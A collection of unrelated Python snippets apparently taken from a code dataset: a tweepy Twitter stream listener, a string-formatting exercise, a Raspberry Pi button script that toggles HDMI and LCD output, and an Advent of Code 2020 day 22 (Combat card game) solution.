            traceback.print_exc()
        # True tells tweepy to keep the stream open
        return True
    def on_error(self, status):
        print status
# Authenticate
auth = OAuthHandler(consumer_key, consumer_secret)
auth.set_access_token(access_token, access_token_secret)
# ...and start streaming
stream = Stream(auth, MyListener())
stream.filter(track=["iphone"])
|
# Sample (name, age) pairs for the string-formatting exercise below.
ages = [('Joe', 9), ('Samantha', 45), ('Methuselah', 969)]
# Exercise: fill in the format string and arguments.
# for (name, age) in ages:
#     print('XXXX'.format(XXXX))
|
#!/usr/bin/python2.7
import RPi.GPIO as GPIO
import subprocess as SP
# File that persists the current display mode ("hdmi" or "lcd").
screenState = "/home/pi/pi-tablet_retropie/assets/currentDisplayMode"
GPIO.setmode(GPIO.BCM)
# Button on BCM pin 23, pulled up; pressing it pulls the pin low.
GPIO.setup(23, GPIO.IN, pull_up_down=GPIO.PUD_UP)
try:
    # block until the button is pressed (falling edge)
    GPIO.wait_for_edge(23, GPIO.FALLING)
    stateFile = open(screenState, 'r')
    state = stateFile.readline()
    state = str(state)
    # NOTE(review): assumes the line ends with exactly one trailing "\n";
    # a file without a newline raises ValueError here — confirm.
    a,b = state.split("\n")
    state = a
    stateFile.close()
    # toggle between HDMI and LCD output, persisting the new mode first
    if (state == "hdmi"):
        SP.call('echo "lcd" > /home/pi/pi-tablet_retropie/assets/currentDisplayMode', shell=True)
        SP.call(['sudo','/home/pi/pi-tablet_retropie/assets/lcd_out'])
        print("LCD-MODE")
    elif (state == "lcd"):
        SP.call('echo "hdmi" > /home/pi/pi-tablet_retropie/assets/currentDisplayMode', shell=True)
        SP.call(['sudo','/home/pi/pi-tablet_retropie/assets/hdmi_out'])
        print("HDMI-MODE")
except KeyboardInterrupt:
    GPIO.cleanup() # clean up GPIO on CTRL+C exit
GPIO.cleanup() # clean up GPIO on normal exit
|
# pylint: disable=unused-wildcard-import
from utils import *
# --- Part 1: regular Combat (AoC 2020 day 22) ---
p1, p2 = inp_groups()
p1 = ints(p1[1:])  # drop the "Player N:" header line
p2 = ints(p2[1:])
while p1 and p2:
    c1, c2 = p1.pop(0), p2.pop(0)
    # higher card wins the round; winner takes both, high card first
    if c1 > c2:
        w = p1
    else:
        w = p2
    w.append(max(c1, c2))
    w.append(min(c1, c2))
# NOTE(review): debug print of the winning deck — remove for clean output.
print(w)
def score(w):
    """Combat score of deck *w*: bottom card x1, next x2, ... top x len(w)."""
    return sum(pos * card for pos, card in enumerate(reversed(w), start=1))
print("Part 1: ", score(w))
# --- Part 2: re-read the starting decks (part 1 consumed the lists) ---
p1, p2 = inp_groups()
p1 = ints(p1[1:])
p2 = ints(p2[1:])
def play(p1, p2):
    """Recursive Combat (AoC 2020 day 22, part 2).

    Returns (winner, winning_deck) where winner is 1 or 2.  A repeated
    game state hands the game to player 1 (infinite-game rule); a round
    recurses when both players hold at least as many cards as they drew.
    """
    p1, p2 = list(p1), list(p2)
    seen = set()
    while p1 and p2:
        snapshot = (tuple(p1), tuple(p2))
        if snapshot in seen:
            return 1, p1
        seen.add(snapshot)
        # progress indicator for long games
        if len(seen) % 1000 == 0:
            print(len(seen), len(p1) + len(p2))
        c1, c2 = p1.pop(0), p2.pop(0)
        if c1 <= len(p1) and c2 <= len(p2):
            round_winner, _ = play(p1[:c1], p2[:c2])
        else:
            round_winner = 1 if c1 > c2 else 2
        # winner takes both cards, their own on top of the pile first
        if round_winner == 1:
            p1 += [c1, c2]
        else:
            p2 += [c2, c1]
    return (1, p1) if p1 else (2, p2)
# Play the full recursive game and score the winner's remaining deck.
(_, w) = play(tuple(p1), tuple(p2))
print("Part 2: ", score(w))
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.